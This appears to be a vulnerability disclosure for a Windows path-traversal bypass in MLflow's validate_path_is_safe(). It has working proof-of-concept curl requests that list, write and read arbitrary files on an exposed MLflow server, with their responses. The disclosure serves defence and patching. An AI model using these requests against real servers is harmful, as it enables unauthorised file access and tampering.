validate_path_is_safe()
function in file /mlflow/server/handlers.py
, introduced in PR #7891 on Feb 24th, 2023 does not account for Windows absolute path format, and thus can be bypassed on MLFlow servers, running on Windows hosts, exposing them to a number of high-impact directory traversals.
The code of the affected validate_path_is_safe()
can be seen below:
_OS_ALT_SEPS = [sep for sep in [os.sep, os.path.altsep] if sep is not None and sep != "/"]
def validate_path_is_safe(path):
"""
Validates that the specified path is safe to join with a trusted prefix. This is a security
measure to prevent path traversal attacks.
"""
if (
any((s in path) for s in _OS_ALT_SEPS)
or ".." in path.split(posixpath.sep)
or posixpath.isabs(path)
):
raise MlflowException(f"Invalid path: {path}", error_code=INVALID_PARAMETER_VALUE)
The function implements 3 separate checks:
/
): any((s in path) for s in _OS_ALT_SEPS)
..
): ".." in path.split(posixpath.sep)
posixpath.isabs(path)
By supplying an absolute Windows path with forward slash (/
) separators, all the above checks can be effectively bypassed:
# Python 3.9.6 on Windows 10 Pro x64 Build 19045
>>> import os
>>> import posixpath
>>> test_path = 'C:/some/abs/path'
>>>
>>> _OS_ALT_SEPS = [sep for sep in [os.sep, os.path.altsep] if sep is not None and sep != "/"]
>>>
>>> any((s in test_path) for s in _OS_ALT_SEPS)
False
>>> ".." in test_path.split(posixpath.sep)
False
>>> posixpath.isabs(test_path)
False
Consequently, the attacker is able to perform directory traversals in any request handlers that use the validate_path_is_safe()
to validate the user-supplied paths.
The validate_path_is_safe()
function is used by 7 separate endpoints in mlflow/server/handlers.py
file and allows the attacker to perform these actions:
_list_artifacts()#910
mapped to GET /ajax-api/2.0/mlflow/artifacts/list
_list_artifacts_mlflow_artifacts()#1707
mapped to GET /ajax-api/2.0/mlflow-artifacts/artifacts
get_artifact_handler()#545
mapped to GET /get-artifact
_download_artifact()#1655
mapped to GET /ajax-api/2.0/mlflow-artifacts/artifacts/PATH
get_model_version_artifact_handler()#1429
mapped to GET /model-versions/get-artifact
_upload_artifact()#1680
mapped to PUT /ajax-api/2.0/mlflow-artifacts/artifacts/PATH
_delete_artifact_mlflow_artifacts()#1731
mapped to DELETE /ajax-api/2.0/mlflow-artifacts/artifacts
The combination of the above actions essentially gives an attacker full control over the server’s file system, and allows to compromise confidentiality, integrity and availability of the user data, contained within the MLFlow server.
Prerequisites: Installed Python3 on the PC
Install latest version of mlflow:
C:\Temp> pip install mlflow
Clone the mlflow repository into a local directory:
C:\Temp> git clone https://github.com/mlflow/mlflow
Run one of the example mlflow scripts, e.g. examples/shap/explainer_logging.py
to populate the mlruns
directory:
C:\Temp\> cd C:\Temp\mlflow\examples\shap
C:\Temp\mlflow\examples\shap> pip install scikit-learn shap matplotlib
C:\Temp\mlflow\examples\shap> python explainer_logging.py
Run the server on Windows machine, expose it to all network interfaces:
C:\Temp\mlflow\examples\shap> mlflow server --host 0.0.0.0
Given that the Windows machine’s external IP address is 10.0.0.1
$ export MLFLOW_SERVER_IP=10.0.0.1
List the existing runs in the MLFlow server. Use "experiment_ids": ["0"]
to get the default experiment. Save run_uuid
value for later use:
# CURL request:
curl -X 'POST' -H 'Content-Type: application/json' -d '{"experiment_ids": ["0"]}' "http://$MLFLOW_SERVER_IP:5000/ajax-api/2.0/mlflow/runs/search"
# Response:
{
"runs": [
{
"info": {
"run_uuid": "POC_RUN_ID",
...
}
}
]
}
Create new model:
# CURL request:
curl -X 'POST' -H 'Content-Type: application/json' -d '{"name":"POC_MODEL_NAME"}' "http://$MLFLOW_SERVER_IP:5000/ajax-api/2.0/mlflow/registered-models/create"
Create new model version by suppying the previously obtained run ID:
# CURL request:
curl -X 'POST' -H 'Content-Type: application/json' -d '{"name":"POC_MODEL_NAME","source":"runs:/POC_RUN_ID"}' "http://$MLFLOW_SERVER_IP:5000/ajax-api/2.0/mlflow/model-versions/create"
Use the obtained IDs to trigger the following LFI actions:
path
value is set to “C:/” in the examples below):Request to /ajax-api/2.0/mlflow/artifacts/list
:
# CURL request:
curl -X 'GET' "http://$MLFLOW_SERVER_IP:5000/ajax-api/2.0/mlflow/artifacts/list?run_uuid=POC_RUN_ID&path=C:/"
# Response:
{
"root_uri": "file:///C:/Users/Strawberry/Desktop/projects/mlflow/examples/shap/mlruns/0/POC_RUN_ID/artifacts",
"files": [
{
"path": "../../../../../../../../../..",
"is_dir": true
},
{
"path": "../../../../../../../../../../../Program Files",
"is_dir": true
},
{
"path": "../../../../../../../../../../../Windows",
"is_dir": true
},
...
]
}
Request to /ajax-api/2.0/mlflow-artifacts/artifacts
:
# CURL request:
curl -X 'GET' "http://$MLFLOW_SERVER_IP:5000/ajax-api/2.0/mlflow-artifacts/artifacts?path=C:/"
# Response:
{
"files": [
{
"path": "..",
"is_dir": true
},
...
{
"path": "Program Files",
"is_dir": true
},
{
"path": "Program Files (x86)",
"is_dir": true
},
{
"path": "ProgramData",
"is_dir": true
},
{
"path": "Recovery",
"is_dir": true
},
{
"path": "System Volume Information",
"is_dir": true
}
]
}
path
value is set to “C:/temp/poc.txt” in the examples below):/ajax-api/2.0/mlflow-artifacts/artifacts/PATH
:# CURL request:
curl -X 'PUT' -d 'this is write poc' "http://$MLFLOW_SERVER_IP:5000/ajax-api/2.0/mlflow-artifacts/artifacts/C:/temp/poc.txt"
# Response:
{}
path
value is set to “C:/temp/poc.txt” in the examples below):Request to /get-artifact
:
# CURL request:
curl -X 'GET' "http://$MLFLOW_SERVER_IP:5000/get-artifact?path=C:/temp/poc.txt&run_uuid=POC_RUN_ID"
# Response:
this is write poc
Request to /ajax-api/2.0/mlflow-artifacts/artifacts/PATH
. Could not be reproduced, gives the following error:
# CURL request:
curl -X 'GET' "http://$MLFLOW_SERVER_IP:5000/ajax-api/2.0/mlflow-artifacts/artifacts/C:/temp/poc.txt"
# Response:
{"error_code": "INTERNAL_ERROR", "message": "The following failures occurred while downloading one or more artifacts from ./mlartifacts: {'C:/temp/poc.txt': 'SameFileError(\"\\'C:\\\\\\\\\\\\\\\\temp\\\\\\\\\\\\\\\\poc.txt\\' and \\'C:/temp/poc.txt\\' are the same file\")'}"}
Request to /model-versions/get-artifact
:
# CURL request:
curl -X 'GET' "http://$MLFLOW_SERVER_IP:5000/model-versions/get-artifact?path=C:/Temp/poc.txt&run_uuid=POC_RUN_ID&name=POC_MODEL_NAME&version=1"
# Response:
this is write poc
path
value is set to “C:/temp/poc.txt” in the examples below):/ajax-api/2.0/mlflow-artifacts/artifacts
. Could not be reproduced, gives the following error:# CURL request:
curl -X 'DELETE' "http://$MLFLOW_SERVER_IP:5000/ajax-api/2.0/mlflow-artifacts/artifacts?path=C:/temp/poc.txt"
# Response:
<!doctype html>
<html lang=en>
<title>405 Method Not Allowed</title>
<h1>Method Not Allowed</h1>
<p>The method is not allowed for the requested URL.</p>